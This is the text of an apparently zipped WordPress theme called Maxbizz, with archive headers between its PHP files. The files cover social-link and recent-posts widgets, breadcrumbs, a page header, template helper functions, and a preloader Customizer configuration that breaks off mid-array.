            <textarea class="widefat" id="<?php echo esc_attr( $this->get_field_id( 'text' ) ); ?>" name="<?php echo esc_attr( $this->get_field_name( 'text' ) ); ?>" type="text" cols="30" rows="10"><?php echo esc_attr( $text ); ?></textarea>
        </p>
        <p>
            <label for="<?php echo $this->get_field_name( 'facebook' ); ?>"><?php _e( 'Facebook URL:' ); ?></label>
            <input class="widefat" id="<?php echo $this->get_field_id( 'facebook' ); ?>" name="<?php echo $this->get_field_name( 'facebook' ); ?>" type="text" value="<?php echo esc_attr( $facebook ); ?>" />
        </p>
        <p>
            <label for="<?php echo $this->get_field_name( 'twitter' ); ?>"><?php _e( 'Twitter URL:' ); ?></label>
            <input class="widefat" id="<?php echo $this->get_field_id( 'twitter' ); ?>" name="<?php echo $this->get_field_name( 'twitter' ); ?>" type="text" value="<?php echo esc_attr( $twitter ); ?>" />
        </p>
        <p>
            <label for="<?php echo $this->get_field_name( 'google' ); ?>"><?php _e( 'Google Plus URL:' ); ?></label>
            <input class="widefat" id="<?php echo $this->get_field_id( 'google' ); ?>" name="<?php echo $this->get_field_name( 'google' ); ?>" type="text" value="<?php echo esc_attr( $google ); ?>" />
        </p>
        <p>
            <label for="<?php echo $this->get_field_name( 'dribbble' ); ?>"><?php _e( 'Dribbble URL:' ); ?></label>
            <input class="widefat" id="<?php echo $this->get_field_id( 'dribbble' ); ?>" name="<?php echo $this->get_field_name( 'dribbble' ); ?>" type="text" value="<?php echo esc_attr( $dribbble ); ?>" />
        </p>
        <p>
            <label for="<?php echo $this->get_field_name( 'linkedin' ); ?>"><?php _e( 'Linkedin URL:' ); ?></label>
            <input class="widefat" id="<?php echo $this->get_field_id( 'linkedin' ); ?>" name="<?php echo $this->get_field_name( 'linkedin' ); ?>" type="text" value="<?php echo esc_attr( $linkedin ); ?>" />
        </p>        
        <p>
            <label for="<?php echo $this->get_field_name( 'pinterest' ); ?>"><?php _e( 'Pinterest URL:' ); ?></label>
            <input class="widefat" id="<?php echo $this->get_field_id( 'pinterest' ); ?>" name="<?php echo $this->get_field_name( 'pinterest' ); ?>" type="text" value="<?php echo esc_attr( $pinterest ); ?>" />
        </p>
        <p>
            <label for="<?php echo $this->get_field_name( 'instagram' ); ?>"><?php _e( 'Instagram URL:' ); ?></label>
            <input class="widefat" id="<?php echo $this->get_field_id( 'instagram' ); ?>" name="<?php echo $this->get_field_name( 'instagram' ); ?>" type="text" value="<?php echo esc_attr( $instagram ); ?>" />
        </p>
        <p>
            <label for="<?php echo $this->get_field_name( 'youtube' ); ?>"><?php _e( 'Youtube URL:' ); ?></label>
            <input class="widefat" id="<?php echo $this->get_field_id( 'fb_url' ); ?>" name="<?php echo $this->get_field_name( 'youtube' ); ?>" type="text" value="<?php echo esc_attr( $youtube ); ?>" />
        </p>        
        <?php
    }
 	
 	/**
     * Sanitize widget form values as they are saved.
     *
     * @see WP_Widget::update()
     *
     * @param array $new_instance Values just sent to be saved.
     * @param array $old_instance Previously saved values from database.
     *
     * @return array Updated safe values to be saved.
     */
    public function update( $new_instance, $old_instance ) {
 
        $instance = array();
 
        $instance['title'] = ( !empty( $new_instance['title'] ) ) ? strip_tags( $new_instance['title'] ) : '';
        $instance['text'] = ( !empty( $new_instance['text'] ) ) ? $new_instance['text'] : '';
        $instance['image'] = ( ! empty( $new_instance['image'] ) ) ? $new_instance['image'] : '';
        $instance['facebook'] = ( ! empty( $new_instance['facebook'] ) ) ? $new_instance['facebook'] : '';
        $instance['twitter'] = ( ! empty( $new_instance['twitter'] ) ) ? $new_instance['twitter'] : '';
        $instance['google'] = ( ! empty( $new_instance['google'] ) ) ? $new_instance['google'] : '';
        $instance['linkedin'] = ( ! empty( $new_instance['linkedin'] ) ) ? $new_instance['linkedin'] : '';
        $instance['pinterest'] = ( ! empty( $new_instance['pinterest'] ) ) ? $new_instance['pinterest'] : '';
        $instance['instagram'] = ( ! empty( $new_instance['instagram'] ) ) ? $new_instance['instagram'] : '';
        $instance['youtube'] = ( ! empty( $new_instance['youtube'] ) ) ? $new_instance['youtube'] : '';
        $instance['dribbble'] = ( ! empty( $new_instance['dribbble'] ) ) ? $new_instance['dribbble'] : '';
 
        return $instance;
    }  
 
}
add_action( 'widgets_init', 'maxbizz_author_register_widgets' );
function maxbizz_author_register_widgets() {
    register_widget( 'Maxbizz_Author_Widget' );
}PK�8FZ�>���%inc/frontend/widgets/recent-posts.phpnu�[���<?php 

class maxbizz_recent_news extends WP_Widget {

    function __construct() {

        parent::__construct(
            // Base ID of your widget
            'recent_news', 

            // Widget name will appear in UI
            esc_html__('OT Recent Posts', 'maxbizz'), 

            // Widget description
            array( 'description' => esc_html__( 'OT Recent Posts', 'maxbizz' ), ) 
        );
    }

    // This is where the action happens

    public function widget( $args, $instance ) {

    	// these are the widget options

    	//$title = apply_filters( 'widget_title', $instance['title'] );

        $title = apply_filters( 'widget_title', empty( $instance['title'] ) ? esc_html__( 'Latest News', 'maxbizz' ) : $instance['title'], $instance, $this->id_base );

    	$date = ! empty( $instance['count'] ) ? '1' : '0';

    // before and after widget arguments are defined by themes

    echo htmlspecialchars_decode($args['before_widget']);

    if ( ! empty( $title ) ){

    	echo htmlspecialchars_decode($args['before_title']) . $title . htmlspecialchars_decode($args['after_title']); 

    }?>
            <ul class="recent-news clearfix">
                <?php 

                $r = new WP_Query(
                    /**
                     * Filters the arguments for the Recent Posts widget.
                     *
                     * @since 3.4.0
                     * @since 4.9.0 Added the `$instance` parameter.
                     *
                     * @see WP_Query::get_posts()
                     *
                     * @param array $args     An array of arguments used to retrieve the recent posts.
                     * @param array $instance Array of settings for the current widget.
                     */
                    apply_filters(
                        'widget_posts_args',
                        array(
                            'posts_per_page'      => $instance['posts_per_page'],
                            'no_found_rows'       => true,
                            'post_status'         => 'publish',
                            'ignore_sticky_posts' => true,
                        ),
                        $instance
                    )
                );
                if ( ! $r->have_posts() ) {
                    return;
                }

                foreach ( $r->posts as $recent_post ) : ?>
                <?php
                    $post_title   = get_the_title( $recent_post->ID );
                    $post_thumb   = get_the_post_thumbnail( $recent_post->ID, 'thumbnail' );
                    $title        = ( ! empty( $post_title ) ) ? $post_title : __( '(no title)' );
                ?>
                <li class="clearfix"> 
                    <?php if( $post_thumb ) { ?>
                    <div class="thumb">
                        <a href="<?php the_permalink( $recent_post->ID ); ?>">
                            <?php echo $post_thumb; ?>
                        </a>
                    </div>
                    <?php } ?>
                    <div class="entry-header">
                        <h6>
                            <a href="<?php the_permalink( $recent_post->ID ); ?>"><?php echo $title; ?></a>
                        </h6>
                        <?php if($date) { ?>
                        <span class="post-on">
                            <span class="entry-date"><?php echo get_the_date( '', $recent_post->ID ); ?></span>
                        </span>
                        <?php } ?>
                    </div>
                </li>
                <?php endforeach; ?>
            </ul>

    <?php 

    echo htmlspecialchars_decode($args['after_widget']);

    }

    public function update( $new_instance, $old_instance ) {

        $instance = $old_instance;

        $instance['title'] = strip_tags($new_instance['title']);

        $instance['count'] = !empty($new_instance['count']) ? 1 : 0;

        $instance['posts_per_page'] = ( ! empty( $new_instance['posts_per_page'] ) ) ? strip_tags( $new_instance['posts_per_page'] ) : '';

        return $instance;

    }

    // Widget Backend 

    public function form( $instance ) {

    // Check values

    	 $title = isset( $instance['title'] ) ? $instance['title'] : esc_html( 'Latest News', 'maxbizz' );

    	 $count = isset($instance['count']) ? (bool) $instance['count'] :false;

         $posts_per_page = isset( $instance['posts_per_page'] ) ? $instance['posts_per_page'] : 3;

    // Widget admin form

    ?>

    <p>
        <label><?php esc_html_e( 'Title:', 'maxbizz' ); ?></label>

        <input class="widefat" id="<?php echo esc_attr($this->get_field_id('title')); ?>" name="<?php echo esc_attr($this->get_field_name('title')); ?>" type="text" value="<?php echo esc_attr($title); ?>" />
    </p>
    <p>

        <label><?php esc_html_e( 'Number of posts to show:', 'maxbizz' ); ?></label> 

        <input size="3" class="widefat" id="<?php echo esc_attr($this->get_field_id('posts_per_page')); ?>" name="<?php echo esc_attr($this->get_field_name('posts_per_page')); ?>" type="text" value="<?php echo esc_attr($posts_per_page); ?>" />
        <br />
    </p>
    <p>
        <label>
            <input type="checkbox" class="checkbox" id="<?php echo esc_attr($this->get_field_id('count')); ?>" name="<?php echo esc_attr($this->get_field_name('count')); ?>"<?php checked( $count ); ?> />

            <?php esc_html_e( 'Show date time', 'maxbizz' ); ?>
        </label>
    </p>

    <?php

    }

} // Class wpb_widget ends here

// Register and load the widget
function maxbizz_wpb_recent_news() {
	register_widget( 'maxbizz_recent_news' );
}
add_action( 'widgets_init', 'maxbizz_wpb_recent_news' );PK�8FZݒDz#%#%(inc/frontend/page-header/breadcrumbs.phpnu�[���<?php
// Breadcrumbs
if ( ! function_exists( 'maxbizz_get_breadcrumbs' ) ) {
    function maxbizz_get_breadcrumbs ( 
        $list_style = 'ul', 
        $list_id = 'breadcrumbs', 
        $list_class = 'breadcrumbs none-style',
        $active_class = 'active', 
        $echo = false ) {
        // Open list
        $breadcrumb = '<' . $list_style . ' id="' . $list_id . '" class="' . $list_class . '">';
        // Front page
        if ( is_front_page() ) {
            $breadcrumb .= '<li class="' . $active_class . '">' . esc_html__('Home', 'maxbizz') . '</li>'; //get_bloginfo( 'name' )
        } else {
            $breadcrumb .= '<li><a href="' . home_url() . '">' . esc_html__('Home', 'maxbizz') . '</a></li>'; //get_bloginfo( 'name' )
        }
        // Blog archive
        if ( 'page' == get_option( 'show_on_front' ) && get_option( 'page_for_posts' ) ) {
            $blog_page_id = get_option( 'page_for_posts' );
            if ( is_home() ) {
                $breadcrumb .= '<li class="' . $active_class . '">' . get_the_title( $blog_page_id )  . '</li>';
            } else if ( is_category() || is_tag() || is_author() || is_date() || is_singular( 'post' ) ) {
                $breadcrumb .= '<li><a href="' . get_permalink( $blog_page_id ) . '">' . get_the_title( $blog_page_id )  . '</a></li>';
            }
        }
        // Category, tag, author and date archives
        if ( is_archive() && ! is_tax() && ! is_post_type_archive() ) {
            $breadcrumb .= '<li class="' . $active_class . '">';
            // Title of archive
            if ( is_category() ) {
                $breadcrumb .= single_cat_title( '', false );
            } else if ( is_tag() ) {
                $breadcrumb .= single_tag_title( '', false );
            } else if ( is_author() ) {
                $breadcrumb .= get_the_author();
            } else if ( is_date() ) {
                if ( is_day() ) {
                    $breadcrumb .= get_the_time( 'F j, Y' );
                } else if ( is_month() ) {
                    $breadcrumb .= get_the_time( 'F, Y' );
                } else if ( is_year() ) {
                    $breadcrumb .= get_the_time( 'Y' );
                }
            }
            $breadcrumb .= '</li>';
        }
        // Posts
        if ( is_singular( 'post' ) ) {
            // Post title
            $breadcrumb .= '<li class="' . $active_class . '">' . get_the_title() . '</li>';
        }
        // Pages
        if ( is_page() && ! is_front_page() ) {
            $post = get_post( get_the_ID() );
            // Page parents
            if ( $post->post_parent ) {
                $parent_id  = $post->post_parent;
                $crumbs = array();
                while ( $parent_id ) {
                    $page = get_page( $parent_id );
                    $crumbs[] = '<a href="' . get_permalink( $page->ID ) . '">' . get_the_title( $page->ID ) . '</a>';
                    $parent_id  = $page->post_parent;
                }
                $crumbs = array_reverse( $crumbs );
                foreach ( $crumbs as $crumb ) {
                    $breadcrumb .= '<li>' . $crumb . '</li>';
                }
            }
            // Page title
            $breadcrumb .=  '<li class="' . $active_class . '">' . get_the_title() . '</li>';
        }
        // Attachments
        if ( is_attachment() ) {
            // Attachment parent
            $post = get_post( get_the_ID() );
            if ( $post->post_parent ) {
                $breadcrumb .= '<li><a href="' . get_permalink( $post->post_parent ) . '">' . get_the_title( $post->post_parent ) . '</a></li>';
            }
            // Attachment title
            $breadcrumb .= '<li class="' . $active_class . '">' . get_the_title() . '</li>';
        }
        // Search
        if ( is_search() ) {
            $breadcrumb .= '<li class="' . $active_class . '">' . esc_html__( 'Search', 'maxbizz' ) . '</li>';
        }
        // 404
        if ( is_404() ) {
            $breadcrumb .= '<li class="' . $active_class . '">' . esc_html__( '404', 'maxbizz' ) . '</li>';
        }
        // Custom Post Type Archive
        if ( is_post_type_archive() ) {
            $breadcrumb .= '<li class="' . $active_class . '">' . post_type_archive_title( '', false ) . '</li>';
        }
        // Custom Taxonomies
        if ( is_tax() ) {
            // Get the post types the taxonomy is attached to
            $current_term = get_queried_object();
            $attached_to = array();
            $post_types = get_post_types();
            foreach ( $post_types as $post_type ) {
                $taxonomies = get_object_taxonomies( $post_type );
                if ( in_array( $current_term->taxonomy, $taxonomies ) ) {
                    $attached_to[] = $post_type;
                }
            }
            // Post type archive link
            $output = false;
            foreach ( $attached_to as $post_type ) {
                $cpt_obj = get_post_type_object( $post_type );
                if ( ! $output && get_post_type_archive_link( $cpt_obj->name ) ) {
                    $archive_link = '';
                    if ( 'ot_portfolio' == get_post_type() && maxbizz_get_option('portfolio_archive') == 'archive_custom' ) {
                        $archive_link = get_page_link( maxbizz_get_option('archive_page_custom') );                                
                    } else {
                        $archive_link = get_post_type_archive_link( $cpt_obj->name );
                    }
                    $breadcrumb .= '<li><a href="' . $archive_link . '">' . $cpt_obj->labels->singular_name . '</a></li>';
                    $output = true;
                }
            }
            // Term title
            $breadcrumb .= '<li class="' . $active_class . '">' . single_term_title( '', false ) . '</li>';
        }
        
        // Custom Post Types
        if ( is_single() && get_post_type() != 'post' && get_post_type() != 'attachment' ) {
            $cpt_obj = get_post_type_object( get_post_type() );            
            
             // Cpt archive
            if ( get_post_type_archive_link( $cpt_obj->name ) ) {
                // Custom portfolio archive page link
                $archive_link = '';
                if ( 'ot_portfolio' == get_post_type() && maxbizz_get_option('portfolio_archive') == 'archive_custom' ) {
                    $archive_link = get_page_link( maxbizz_get_option('archive_page_custom') );                                
                } else {
                    $archive_link = get_post_type_archive_link( $cpt_obj->name );
                }

                $breadcrumb .= '<li><a href="' . $archive_link . '">' . $cpt_obj->labels->singular_name . '</a></li>';
            }

            // Is cpt hierarchical like pages or posts?
            if ( is_post_type_hierarchical( $cpt_obj->name ) ) {
                // Like pages               
                // Cpt parents
                $post = get_post( get_the_ID() );
                if ( $post->post_parent ) {
                    $parent_id  = $post->post_parent;
                    $crumbs = array();
                    while ( $parent_id ) {
                        $page = get_page( $parent_id );
                        $crumbs[] = '<a href="' . get_permalink( $page->ID ) . '">' . get_the_title( $page->ID ) . '</a>';
                        $parent_id  = $page->post_parent;
                    }
                    $crumbs = array_reverse( $crumbs );
                    foreach ( $crumbs as $crumb ) {
                        $breadcrumb .= '<li>' . $crumb . '</li>';
                    }
                }
            } else {
                // Like posts
                // Get cpt taxonomies
                $cpt_taxes = get_object_taxonomies( $cpt_obj->name );
                if ( $cpt_taxes && is_taxonomy_hierarchical( $cpt_taxes[0] ) ) {
                    // Other taxes attached to the cpt could be hierachical, so need to look into that.
                    $cpt_terms = get_the_terms( get_the_ID(), $cpt_taxes[0] );
                    if ( is_array( $cpt_terms ) ) {
                        foreach( $cpt_terms as $cpt_term ) {
                            // The $term is an object, so we don't need to specify the $taxonomy.
                            $term_link = get_term_link( $cpt_term );
                            
                            // If there was an error, continue to the next term.
                            if ( is_wp_error( $term_link ) ) {
                                continue;
                            }
                            $breadcrumb .= '<li><a href="' . esc_url( $term_link ) . '">' . $cpt_term->name . '</a></li>';
                        }
                    }
                }
            }
            // Cpt title
            $breadcrumb .= '<li class="' . $active_class . '">' . get_the_title() . '</li>';
        }
        // Close list
        $breadcrumb .= '</' . $list_style . '>';

        // Ouput
        return $breadcrumb;
    }
}

if ( ! function_exists( 'maxbizz_breadcrumbs' ) ) {
    function maxbizz_breadcrumbs (){

        if( maxbizz_get_option('breadcrumbs') && !is_front_page() ){ echo maxbizz_get_breadcrumbs(); } ?>
    
        <?php
    }
}PK�8FZ=�?7--(inc/frontend/page-header/page-header.phpnu�[���<?php
if ( ! function_exists( 'maxbizz_page_header' ) ) {
    function maxbizz_page_header (){
        $pheader = '';
        if ( function_exists('rwmb_meta') ) {
            $pheader = rwmb_meta('pheader_switch');
            if( is_home() || is_archive() || is_search() || is_singular('post') ){
                $pheader = rwmb_meta('pheader_switch', "type=switch", get_option( 'page_for_posts' ));
            }
            if( class_exists( 'woocommerce' ) ){
                if( is_shop() || is_product_category() || is_product_tag() || is_product() ){
                    $pheader = rwmb_meta('pheader_switch', "type=switch", get_option( 'woocommerce_shop_page_id' ));
                }
            }
            if( !$pheader ){
                return;
            }
        }
        if( !maxbizz_get_option('pheader_switch') && !$pheader ) {
            return;
        }else{
            $bg     = '';
            $title  = '';
            $output = array();

            if ( is_home() ) {
                $title = get_the_title(get_option('page_for_posts'));
            } elseif ( is_search() ) {
                $title = esc_html__('Search Results for: ', 'maxbizz') . get_search_query();
            } elseif ( is_archive() ) {
                $title = get_the_archive_title();
            } elseif ( is_singular('post') ) {
                $title = maxbizz_get_option( 'ptitle_post' ) ? maxbizz_get_option( 'ptitle_post' ) : get_the_title();
            }else {
                $title = get_the_title();
            }
            
            if (!function_exists('rwmb_meta')) {
                $bg = maxbizz_get_option( 'pheader_img' );
            } else {
                if( is_home() ) {
                    $images = rwmb_meta('pheader_bg_image', "type=image", get_option( 'page_for_posts' ));
                }elseif( class_exists( 'woocommerce' ) ){
                    if( is_shop() || is_product_category() || is_product_tag() || is_product() ){
                        $images = rwmb_meta('pheader_bg_image', "type=image", get_option( 'woocommerce_shop_page_id' ));
                    }else{
                        $images = rwmb_meta('pheader_bg_image', "type=image");
                    }
                }else{
                    $images = rwmb_meta('pheader_bg_image', "type=image");
                }
                if (!$images) {
                    $bg = maxbizz_get_option( 'pheader_img' );
                } else {
                    foreach ($images as $image) {
                        $bg = $image['full_url'];
                        break;
                    }
                }
            }

            if ($title) {
                $output[] = sprintf('%s', $title);
            }
        ?>        
            <div class="page-header flex-middle" <?php if ($bg) { ?> style="background-image: url(<?php echo esc_url($bg); ?>);" <?php } ?>>
                <div class="container">
                    <div class="inner <?php if( !maxbizz_get_option( 'left_bread' ) ) echo 'flex-middle'; ?>">
                        <?php if( class_exists( 'woocommerce' ) && is_woocommerce() ) { ?>
                            <?php if( !is_product() ){ ?>
                                <?php if ( apply_filters( 'woocommerce_show_page_title', true ) ) : ?>
                                    <h1 class="woocommerce-products-header__title page-title"><?php woocommerce_page_title(); ?></h1>
                                <?php endif; ?>                            
                            <?php }else{ ?>
                                <h2 class="page-title"><?php echo esc_html( maxbizz_get_option( 'page_title_product' ) ); ?></h2>
                            <?php } ?>    
                            <?php do_action( 'maxbizz_woocommerce_breadcrumb' ); ?>
                        <?php }else{ ?>
                            <h1 class="page-title"><?php echo implode('', $output); ?></h1>
                        <?php 
                            if (function_exists('maxbizz_breadcrumbs') && maxbizz_get_option('breadcrumbs')):
                                echo maxbizz_breadcrumbs();
                            endif;
                        } ?>
                    </div>
                </div>
            </div>
        <?php
        }
    }
}PK�8FZ���!�!#inc/frontend/template-functions.phpnu�[���<?php
/**
 * Functions which enhance the theme by hooking into WordPress
 *
 * @package Maxbizz
 */

/** 
 * Add body class by filter 
 * 
 */
add_filter( 'body_class', 'maxbizz_body_class_names', 999 );
function maxbizz_body_class_names( $classes ) {
	
	$theme = wp_get_theme();
	if( is_child_theme() ) { $theme = wp_get_theme()->parent(); }

  	$classes[] = 'maxbizz-theme-ver-'.$theme->version;

  	$classes[] = 'wordpress-version-'.get_bloginfo( 'version' );

  	if ( maxbizz_get_option('footer_fixed') != false ){
		$classes[] = 'footer-fixed';
	}

  	return $classes;
}

/**
 *  Add specific CSS class to header
 */
function maxbizz_header_class() {

	$header_classes = '';

	if ( maxbizz_get_option('header_fixed') != false ){
		$header_classes = 'header-transparent';
	}else{
		$header_classes = 'header-static';
	}
	if ( function_exists('rwmb_meta') ) {
		if( rwmb_meta('is_trans') == 'yes'){
			$header_classes = 'header-transparent';
		}elseif( rwmb_meta('is_trans') == 'no'){
			$header_classes = 'header-static';
		}
	}
	
    echo $header_classes;
}

/**
 * Add a pingback url auto-discovery header for single posts, pages, or attachments.
 */
function maxbizz_pingback_header() {
	if ( is_singular() && pings_open() ) {
		echo '<link rel="pingback" href="', esc_url( get_bloginfo( 'pingback_url' ) ), '">';
	}
}
add_action( 'wp_head', 'maxbizz_pingback_header' );

//Get layout post & page.
if ( ! function_exists( 'maxbizz_get_layout' ) ) :
	function maxbizz_get_layout() {
		// Get layout.
		if( is_page() && !is_home() && function_exists( 'rwmb_meta' ) ) {
			$page_layout = rwmb_meta('page_layout');
		}elseif( is_single() ){
			$page_layout = maxbizz_get_option( 'single_post_layout' );
		}else{
			$page_layout = maxbizz_get_option( 'blog_layout' );
		}

		return $page_layout;
	}
endif;

/**
 * Set the content width in pixels, based on the theme's design and stylesheet.
 *
 * Priority 0 to make it available to lower priority callbacks.
 *
 * @global int $content_width
 */
if ( ! function_exists( 'maxbizz_content_columns' ) ) :
	function maxbizz_content_columns() {

		$blog_content_width = array();

		// Check if layout is one column.
		if ( 'content-sidebar' === maxbizz_get_layout() && is_active_sidebar( 'primary' ) ) {
			$blog_content_width[] = 'col-lg-9 col-md-9 col-sm-12 col-xs-12';
		}elseif ('sidebar-content' === maxbizz_get_layout() && is_active_sidebar( 'primary' ) ) {
			$blog_content_width[] = 'col-lg-9 col-md-9 col-sm-12 col-xs-12 pull-right';
		}else{
			$blog_content_width[] = 'col-lg-12 col-md-12 col-sm-12 col-xs-12';
		}

		// return the $classes array
    	echo implode( ' ', $blog_content_width );
	}
endif;

/**
 * Portfolio Columns
 */
if ( ! function_exists( 'maxbizz_portfolio_option_class' ) ) :
	function maxbizz_portfolio_option_class() {

		$portfolio_option_class = array();

		if( maxbizz_get_option('portfolio_column') == "2cl" ){
			$portfolio_option_class[] = 'pf_2_cols';
		}elseif( maxbizz_get_option('portfolio_column') == "4cl" ) {
			$portfolio_option_class[] = 'pf_4_cols';
		}elseif( maxbizz_get_option('portfolio_column') == "5cl" ) {
			$portfolio_option_class[] = 'pf_5_cols';
		}else{
			$portfolio_option_class[] = '';
		}

		if( maxbizz_get_option('portfolio_style') == "style2" ) {
			$portfolio_option_class[] = 'style-2';
		}elseif( maxbizz_get_option('portfolio_style') == "style3" ) {
			$portfolio_option_class[] = 'style-3';
		}else{
			$portfolio_option_class[] = 'style-1';
		}

	    // return the $classes array
	    echo implode( ' ', $portfolio_option_class );
	}
endif;

/**
 * Change Posts Per Page for Portfolio Archive.
 * 
 * @param object $query data
 *
 */
function maxbizz_change_portfolio_posts_per_page( $query ) {
	$portfolio_ppp = (!empty( maxbizz_get_option('portfolio_posts_per_page') ) ? maxbizz_get_option('portfolio_posts_per_page') : '6');

	if ( !is_singular() && !is_admin() ) {		
	    if ( $query->is_post_type_archive( 'ot_portfolio' ) || $query->is_tax('portfolio_cat') && ! is_admin() && $query->is_main_query() ) {
	        $query->set( 'posts_per_page', $portfolio_ppp );
	    }
	}
    return $query;
}
add_filter( 'pre_get_posts', 'maxbizz_change_portfolio_posts_per_page' );

/**
 * Load More Ajax Portfolio
 */
add_action( 'wp_enqueue_scripts', 'maxbizz_script_and_styles', 1 );
function maxbizz_script_and_styles() {
	global $wp_query;

	// register our main script but do not enqueue it yet
	wp_register_script( 'maxbizz_scripts', get_template_directory_uri() . '/js/myloadmore.js', array('jquery'), time() );

	// now the most interesting part
	// we have to pass parameters to myloadmore.js script but we can get the parameters values only in PHP
	// you can define variables directly in your HTML but I decided that the most proper way is wp_localize_script()
	wp_localize_script( 'maxbizz_scripts', 'maxbizz_loadmore_params', array(
		'ajaxurl' => site_url() . '/wp-admin/admin-ajax.php', // WordPress AJAX
	) );

 	wp_enqueue_script( 'maxbizz_scripts' );
}

add_action('wp_ajax_loadmore', 'maxbizz_loadmore_ajax_handler'); // wp_ajax_{action}
add_action('wp_ajax_nopriv_loadmore', 'maxbizz_loadmore_ajax_handler'); // wp_ajax_nopriv_{action}

function maxbizz_loadmore_ajax_handler(){
	$offset  = (isset($_POST['offset'])) ? $_POST['offset'] : 0;
	$cat     = (isset($_POST['cat'])) ? $_POST['cat'] : 0;
	$ppp     = (isset($_POST['ppp'])) ? $_POST['ppp'] : 3;
	$style   = (isset($_POST['style'])) ? $_POST['style'] : 'p-grid';
	if( $_POST['cat'] != '' ){
		$args = array(
			'post_type' 	 => 'ot_portfolio',
			'posts_per_page' => $ppp,
			'offset'         => $offset,
			'tax_query' => array(
				array(
					'taxonomy' => 'portfolio_cat',
					'field' => 'term_id',
					'terms' => explode(",",$cat),
				),
			), 
		);
	}else{
		$args = array(
			'post_type' 	 => 'ot_portfolio',
			'posts_per_page' => $ppp,
			'offset'         => $offset,
		);
	}

	$wp_query = new \WP_Query($args);
		while ($wp_query -> have_posts()) : $wp_query -> the_post();
		if( $style == 'p-grid' ){
			get_template_part( 'template-parts/content', 'project' );
		}else{
			get_template_part( 'template-parts/content', 'project-masonry' );
		}
		endwhile; 

	die;
}

/**
 * Back-To-Top on Footer
 */
if( !function_exists('maxbizz_custom_back_to_top') ) {
    function maxbizz_custom_back_to_top() {     
	    if( maxbizz_get_option('backtotop') != false ){
	    	echo '<a id="back-to-top" href="#" class="show"><i class="ot-flaticon-left-arrow-2"></i></a>';
	    }
    }
}
add_action('wp_footer', 'maxbizz_custom_back_to_top');

/**
 * Google Analytics
 */
if ( ! function_exists( 'maxbizz_hook_javascript' ) ) {
	function maxbizz_hook_javascript() {
		if ( maxbizz_get_option('js_code') != '' ) {
	    ?>
	    	<!-- Google Analytics code -->
	    	<script type="text/javascript">
	            <?php echo maxbizz_get_option('js_code'); ?>
	        </script>
	    <?php
	    }
	}
}
add_action('wp_head', 'maxbizz_hook_javascript');

/**
 * Render date-time in Copyright
 */
function oceanthemes_date_func( $atts ) {
    $date_format = shortcode_atts( array(
        'time_custom' => 'Y',        
    ), $atts );

    $dt = new DateTime("now");
    $gmt_timestamp = $dt->format("{$date_format['time_custom']}");

    return $gmt_timestamp;
}
add_shortcode( 'oceanthemes_date', 'oceanthemes_date_func' );

/* Convert hexdec color string to rgb(a) string */
 
function hex2rgba($color, $opacity = false) {
 
	$default = 'rgb(0,0,0)';
 
	//Return default if no color provided
	if(empty($color))
        return $default; 
 
	//Sanitize $color if "#" is provided 
    if ($color[0] == '#' ) {
    	$color = substr( $color, 1 );
    }

    //Check if color has 6 or 3 characters and get values
    if (strlen($color) == 6) {
        $hex = array( $color[0] . $color[1], $color[2] . $color[3], $color[4] . $color[5] );
    } elseif ( strlen( $color ) == 3 ) {
       	$hex = array( $color[0] . $color[0], $color[1] . $color[1], $color[2] . $color[2] );
    } else {
        return $default;
    }

    //Convert hexadec to rgb
    $rgb =  array_map('hexdec', $hex);

    //Check if opacity is set(rgba or rgb)
    if($opacity){
    	if(abs($opacity) > 1)
		$opacity = 1.0;
    	$output = 'rgba('.implode(",",$rgb).','.$opacity.')';
    } else {
    	$output = 'rgb('.implode(",",$rgb).')';
    }

    //Return rgb(a) color string
    return $output;
}PK�8FZ]�<<inc/frontend/preloader.phpnu�[���<?php

function preloader_customize_settings() {
	/**
	 * Customizer configuration
	 */

	$settings = array(
		'theme' => 'maxbizz',
	);

	$panels = array(

	);

	$sections = array(
		'preload_section'     => array(
			'title'       => esc_attr__( 'Preloader', 'maxbizz' ),
			'description' => '',
			'priority'    => 22,
			'capability'  => 'edit_theme_options',
		),
	);

	$fields = array(	
        /* preloader */
        'preload'     => array(
            'type'        => 'toggle',
            'label'       => esc_attr__( 'Preloader', 'maxbizz' ),
            'section'     => 'preload_section',
            'default'     => 0,
            'priority'    => 10,
        ),
        'preload_logo'    => array(
            'type'     => 'image',
            'label'    => esc_html__( 'Logo Preload', 'maxbizz' ),
            'section'  => 'preload_section',
            'default'  => trailingslashit( get_template_directory_uri() ) . 'images/logo.svg',
            'priority' => 11,
            'active_callback' => array(
                array(
                    'setting'  => 'preload',
                    'operator' => '==',
                    'value'    => 1,
                ),
            ),
        ),
        'preload_logo_width'     => array(
            'type'     => 'slider',
            'label'    => esc_html__( 'Logo Width', 'maxbizz' ),
            'section'  => 'preload_section',
            'default'  => 124,
            'priority' => 12,
            'choices'   => array(
                'min'  => 0,
                'max'  => 400,
                'step' => 1,
            ),
            'active_callback' => array(
                array(
                    'setting'  => 'preload',
                    'operator' => '==',
                    'value'    => 1,
                ),
            ),
        ),
        'preload_logo_height'    => array(
            'type'     => 'slider',
            'label'    => esc_html__( 'Logo Height', 'maxbizz' ),
            'section'  => 'preload_section',
            'default'  => 50,
            'priority' => 13,
            'choices'   => array(
                'min'  => 0,
                'max'  => 200,
                'step' => 1,
            ),
            'active_callback' => array(
                array(
                    'setting'  => 'preload',
                    'operator' => '==',
                    'value'    => 1,
                ),
            ),
        ),
        'preload_text_color'    => array(
            'type'     => 'color',
            'label'    => esc_html__( 'Percent Text Color', 'maxbizz' ),
            'section'  => 'preload_section',
            'default'  => '#0a0f2b',
            'priority' => 14,
            'active_callback' => array(
                array(
                    'setting'  => 'preload',
                    'operator' => '==',
                    'value'    => 1,
                ),
            ),
        ),
        'preload_bgcolor'    => array(
            'type'     => 'color',
            'label'    => esc_html__( 'Background Color', 'maxbizz' ),
            'section'  => 'preload_section',
            'default'  => '#fff',
            'priority' => 15,
            'active_callback' => array(
                array(
                    'setting'  => 'preload',
                    'operator' => '==',
                    'value'    => 1,
                ),
            ),
        ),
        'preload_typo' => array(
            'type'        => 'typography',
            'label'       => esc_attr__( 'Percent Preload Font', 'maxbizz' ),
            'section'     => 'preload_section',
            'default'     => array(
                'font-family'    => 'Roboto',
                'variant'        => 'regular',
                'font-size'      => '13px',
                'line-height'    => '40px',
                'letter-spacing' => '2px',
                'subsets'        => array( 'latin-ext' ),                
                'text-transform' => 'none',
                'text-align'     => 'center'
            ),
            'priority'    => 16,
            'output'      => array(
                array(
                    'element' => '#royal_preloader.royal_preloader_logo .royal_preloader_percentage',
                ),
            ),
            'active_callback' => array(
                array(
                    'setting'  => 'preload',
                    'operator' => '==',
                    'value'    => 1,
                ),
            ),
        ),
